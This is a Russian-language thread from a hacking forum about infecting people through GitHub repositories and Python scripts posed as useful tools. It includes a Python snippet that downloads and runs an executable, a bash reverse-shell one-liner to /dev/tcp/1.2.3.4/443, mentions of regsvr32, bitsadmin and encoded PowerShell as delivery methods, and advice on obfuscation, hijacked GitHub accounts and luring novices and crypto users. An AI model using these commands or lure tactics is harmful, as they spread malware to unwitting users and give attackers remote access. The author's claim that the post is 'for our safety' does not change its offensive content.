• XSS.stack #1 – первый литературный журнал от юзеров форума

github для вируса

Отслеживать
xrahitel

xrahitel

(L1) cache
Пользователь
Регистрация
29.04.2014
Сообщения
847
Реакции
1 368
Всем привет сегодня поговорим как легко можно заразить через github по моим наблюдения у каждого второго стоит питон на компе :D как правило все потому что данный язык программирования очень прост и набирает все больше популярности,самое интересно что мы пачками скачиваем файлы,библиотеки через pip а что там не кому в голову не приходило,возьмем чисто для примера Zoom для чего он видео.

Думаю все понятно пиздуем себе в акк редачим файл README.md и подгружаем свой файл для доставке его жертве и бегом по бордам хвастаться своим охуенным сканером ,конечно если догнать и монетизировать то можно взять все базы про чекать на запрос гитхабика думаю там много акков как это в принципе выглядит видео секретный код по катом :lol2:
import os,wget
filename = 'putty.com'
url = 'https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'
Files = wget.download(url,filename)
os.startfile(Files)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Тема с заражением кулхацкеров весьма интересная, кроба в своем блоге писал что-то такое тоже. Сделать тулзу, которая брутит акки контакта без капчи, или какой-то дорген, или еще что, и впаривать сеошникам.
 
Я конечно извиняюсь но ЧТО ЭТО ТАКОЕ?
Мега тема о том как скинуть кому-то линк на команду которую надо выполнить в терминале? Ладно автор недалекий но комменты ниже меня убили совсем, если это те кто якобы "следующие поколение" то рок не только мертв но и уже изрядно подванивает.


P.S Такие вещи ясны по умолчанию что "невнимательным" можно и команду скинуть он ее выполнит, зачем тему то создавать ? Или это по вашему достойно отдельной темы?
 
sii сказал(а):
Ладно автор недалекий
ты за метлой своей следи а так и вьебаться можно..
 
xrahitel сказал(а):
ты за метлой своей следи а так и вьебаться можно..
Ого, угрозы на форуме... на каком моменте мне должно быть страшно?
Метла? Ну если у вас метла (метла метет мусор, тогда и с темой все понятно) не стоит всех остальных по себе судить.

Ну так если серьезно: реально считаете что достойно отдельной темы ?
Как по мне то тема о том как собрать вирь под никсы из сурцов была бы веселее и интереснее, там хоть есть с чего посмеяться :)
Грустно это все.
 
sii сказал(а):
Ого, угрозы на форуме... на каком моменте мне должно быть страшно?
Метла? Ну если у вас метла (метла метет мусор, тогда и с темой все понятно) не стоит всех остальных по себе судить.

Ну так если серьезно: реально считаете что достойно отдельной темы ?
Как по мне то тема о том как собрать вирь под никсы из сурцов была бы веселее и интереснее, там хоть есть с чего посмеяться :)
Грустно это все.
36gif_5947845_29246622.gif
да какие угрозы просто хамство с детства не люблю и всегда его пресекал и буду пресекать по части темы для на пополнения борда думаю ей тут быть,также это просто пример все можно монетизировать ну она больше для безопасности чтоб как говориться не щелкали когда скачивают все подряд :smile76:
 
xrahitel сказал(а):
36gif_5947845_29246622.gif
да какие угрозы просто хамство с детства не люблю и всегда его пресекал и буду пресекать по части темы для на пополнения борда думаю ей тут быть,также это просто пример все можно монетизировать ну она больше для безопасности чтоб как говориться не щелкали когда скачивают все подряд :smile76:

Спору нет я переборщил если речь просто о том что надо хоть каким-то контентом заполнять чтобы были темы с новыми датами, тогда да можно хоть о "подкидываем радио няню вместо жучка и делаем прослушку" (первый бред который пришел в голову, серьезно не воспринимать)
Ну а если кто-то так щелкает, может стоит чтобы разок на грабли наступили?)

P.S Все-же может стоит как-то качество контента смотреть, а то будет тут очередной ****** ( подставить любой из новых читеро-брутеровских форумов)

P.P.S Не правильно понял тему, думал вы серьезно, буду держать себя в руках.
 
sii сказал(а):
Спору нет я переборщил если речь просто о том что надо хоть каким-то контентом заполнять чтобы были темы с новыми датами, тогда да можно хоть о "подкидываем радио няню вместо жучка и делаем прослушку" (первый бред который пришел в голову, серьезно не воспринимать)
Ну а если кто-то так щелкает, может стоит чтобы разок на грабли наступили?)

P.S Все-же может стоит как-то качество контента смотреть, а то будет тут очередной ****** ( подставить любой из новых читеро-брутеровских форумов)

P.P.S Не правильно понял тему, думал вы серьезно, буду держать себя в руках.
да согласен полностью но написать что-то путнее ты не хуже меня знаешь,надо время и желания самое главное а его как правила нет....:smile7: да и похмелья мешает а тут новый ещё скоро но лично моё мнения борд нормально стартовал и контент будет только лучше если сами этого захотим конечно,все ушел с темы всем всего доброго и с наступающим Братцы Всех :smile8:
 
sii сказал(а):
Я конечно извиняюсь но ЧТО ЭТО ТАКОЕ?
Мега тема о том как скинуть кому-то линк на команду которую надо выполнить в терминале? Ладно автор недалекий но комменты ниже меня убили совсем, если это те кто якобы "следующие поколение" то рок не только мертв но и уже изрядно подванивает.


P.S Такие вещи ясны по умолчанию что "невнимательным" можно и команду скинуть он ее выполнит, зачем тему то создавать ? Или это по вашему достойно отдельной темы?


sii
Отписываться в каждой теме, что достойно а что нет, по типу "заработай на файлообменниках 300р" или "сливаю схему на 5к ру" - тебя попросту не хватит.
Любая тема достойна обсуждения для заинтересованных (возможно как старт для развития своего направления на ее основе), незаинтересованные же пройдут мимо.
Для всего остального есть модераторы. Пока форум свежий - нужен трафф. В дальнейшем думаю будут чистить\переносить. На личности переходить все же не нужно.
 
Desoxyn сказал(а):
sii
Отписываться в каждой теме, что достойно а что нет, по типу "заработай на файлообменниках 300р" или "сливаю схему на 5к ру" - тебя попросту не хватит.
Любая тема достойна обсуждения для заинтересованных (возможно как старт для развития своего направления на ее основе), незаинтересованные же пройдут мимо.
Для всего остального есть модераторы. Пока форум свежий - нужен трафф. В дальнейшем думаю будут чистить\переносить. На личности переходить все же не нужно.
Тут хватает старых статей для траффика.
Темы о том как ключ windows 10 получить - последнее что заинтересует конечного пользователя на подобном форуме. Пока такие темы выглядят как попытки наполнить контентом, но если такой контент продолжится (а кому то может показаться что такое подходит на форуме, раз это не критикуют, а еще и положительные комментарии пишут) будет плохо.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Python... фу. Лучше уж тогда тоже самое в MSBuild проект засунуть.
 
Ну вообще хоть оно может быть и
Python... фу.
, но как правильно заметил
xrahitel сказал(а):
у каждого второго стоит питон на компе
. А у кого линукс, у того у каждого первого. И уже известны случаи тут вот да и ещё много где об этом писали. Когда просто заливался код где к функционалу который у оригинала, просто добавляли нужные строки . А с учётом того что сейчас и правда очень модно стало "быть прогрАмистом" , то впарить такое не так уж сложно. Достаточно наверное просто пробежаться по всяким бордам где сидят юные калилинуксоиды и им подобные молодые дарования, которые сам питон не знают,а вот ctrl+a , ctrl+v ,это прям очень хорошо знают )) Или же по форумам с криптовалюто_дрочерами. Рассказав им какую нибудь чувственную историю , про чудо-скрипт ,который позволит им майнить-угадывать-подменять-предсказывать_курс(нужное подчеркнуть) . И.. думаю природная жадность и недалёкость большинства юзеров сети интернет победит здравый смысл и виндовс дефендер)) То же касается и любителей всяческих покер-ботов, и тп. В общем нормальный такой способ ,нормально так без особых затрат , пускай и не много но за то адресно,по нужной тематике, подгружать чего то на пк обычного обывателя..
И это наверное один из минусов того что принято называть open source ,и касается не только питона и руби с node.js(как в примере выше) .Буквально несколько месяцев назад, был взломан гитхаб аккаунт Gentoo одного из основных четырёх мировых дистрибутивов источник. И хоть последствий серьёзных и не успело быть. Но сам факт того что бесплатный софт,ни хрена ни кто не защищает, имеет место быть безусловно..
 
Python не ФУ
А если серьезно можно regsvr32 /i строчку ну или в крайнем случае битсадмин в dos encode если речь о win, если о *nix говорить то там можно "bash -i >& /dev/tcp/1.2.3.4/443 0>&1" , если целевая аудитория ведется на такое то хоть Powershell строку давай без некогда всеровно запустят :-D
 
главное как это все подать как пример видео,выложи сейчас его на школо борде там все у тебя будут ещё и просить чтоб помог им зверя своего воткнуть :smile91: говорю так как точно знаю в бою проверено.


p.s скачать тут тыц также не кто не отменял obfuscator им ебнул кто там будет сидеть его расшифровать ради сканера портов или бота в телегу,давайте будем честными Все мы почти скачивает и код крайне редко смотрим,можно и добить эту атаку этим тыц можно поспорить конечно но данное видео и питон Вам даст больше инсталлов чем любой ютуб и.т.д но если угнаные акк гатхабика где звезд нормально думаю профит реально будет но ещё раз скажу это для Нашей безопасности за постил этот топ не больше
36gif_5947845_29246622.gif
до кучи тыц
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх